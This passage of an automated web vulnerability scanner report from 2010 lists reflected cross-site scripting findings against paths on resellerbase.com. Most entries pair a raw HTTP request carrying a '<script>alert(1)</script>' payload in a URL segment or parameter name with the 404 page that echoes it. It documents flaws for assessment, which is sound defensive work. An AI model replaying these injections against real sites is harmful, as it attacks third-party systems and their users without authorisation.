2.5437. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f08a9<script>alert(1)</script>11a6ad1a17b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicef08a9<script>alert(1)</script>11a6ad1a17b/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicef08a9<script>alert(1)</script>11a6ad1a17b/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5438. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b113e<script>alert(1)</script>9e31b040e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesb113e<script>alert(1)</script>9e31b040e7/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesb113e<script>alert(1)</script>9e31b040e7/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5439. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52557<script>alert(1)</script>60a1d2a4816 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos52557<script>alert(1)</script>60a1d2a4816/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos52557<script>alert(1)</script>60a1d2a4816/images/review/ was not found on this server.</p>
...[SNIP]...

2.5440. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0639<script>alert(1)</script>af91116c166 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesb0639<script>alert(1)</script>af91116c166/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesb0639<script>alert(1)</script>af91116c166/review/ was not found on this server.</p>
...[SNIP]...

2.5441. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ac5d7<script>alert(1)</script>12d9ffb51f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/reviewac5d7<script>alert(1)</script>12d9ffb51f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/reviewac5d7<script>alert(1)</script>12d9ffb51f/ was not found on this server.</p>
...[SNIP]...

2.5442. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e40a2<script>alert(1)</script>9f1ef26aeec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/?e40a2<script>alert(1)</script>9f1ef26aeec=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/?e40a2<script>alert(1)</script>9f1ef26aeec=1 was not found on this server.</p>
...[SNIP]...

2.5443. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d93a2<script>alert(1)</script>6e1ed5669a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced93a2<script>alert(1)</script>6e1ed5669a0/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced93a2<script>alert(1)</script>6e1ed5669a0/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5444. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cdaed<script>alert(1)</script>2643be32dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themescdaed<script>alert(1)</script>2643be32dcc/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themescdaed<script>alert(1)</script>2643be32dcc/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5445. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 21ed6<script>alert(1)</script>9c3ce00f252 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos21ed6<script>alert(1)</script>9c3ce00f252/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos21ed6<script>alert(1)</script>9c3ce00f252/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5446. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 347fd<script>alert(1)</script>cc6c4c6a652 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images347fd<script>alert(1)</script>cc6c4c6a652/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images347fd<script>alert(1)</script>cc6c4c6a652/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5447. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 45f7e<script>alert(1)</script>aac3d10fcf2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review45f7e<script>alert(1)</script>aac3d10fcf2/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review45f7e<script>alert(1)</script>aac3d10fcf2/0.gif was not found on this server.</p>
...[SNIP]...

2.5448. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fdb16<script>alert(1)</script>d33a21c73f7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/0.giffdb16<script>alert(1)</script>d33a21c73f7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/0.giffdb16<script>alert(1)</script>d33a21c73f7 was not found on this server.</p>
...[SNIP]...

2.5449. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 652e0<script>alert(1)</script>ff6e15ab805 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/0.gif?652e0<script>alert(1)</script>ff6e15ab805=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/0.gif?652e0<script>alert(1)</script>ff6e15ab805=1 was not found on this server.</p>
...[SNIP]...

2.5450. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8e9c<script>alert(1)</script>68f334904ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced8e9c<script>alert(1)</script>68f334904ae/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced8e9c<script>alert(1)</script>68f334904ae/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5451. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 86e1f<script>alert(1)</script>72cd647f278 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes86e1f<script>alert(1)</script>72cd647f278/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes86e1f<script>alert(1)</script>72cd647f278/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5452. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8d79e<script>alert(1)</script>3c8af91605d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos8d79e<script>alert(1)</script>3c8af91605d/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos8d79e<script>alert(1)</script>3c8af91605d/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5453. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc991<script>alert(1)</script>aaccda69e39 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesbc991<script>alert(1)</script>aaccda69e39/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesbc991<script>alert(1)</script>aaccda69e39/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5454. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cfb14<script>alert(1)</script>3c0fec4c1e5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/reviewcfb14<script>alert(1)</script>3c0fec4c1e5/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/reviewcfb14<script>alert(1)</script>3c0fec4c1e5/5.gif was not found on this server.</p>
...[SNIP]...

2.5455. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bea71<script>alert(1)</script>91a5159231a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/5.gifbea71<script>alert(1)</script>91a5159231a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/5.gifbea71<script>alert(1)</script>91a5159231a was not found on this server.</p>
...[SNIP]...

2.5456. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/review/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63849<script>alert(1)</script>aee6cc06267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/5.gif?63849<script>alert(1)</script>aee6cc06267=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

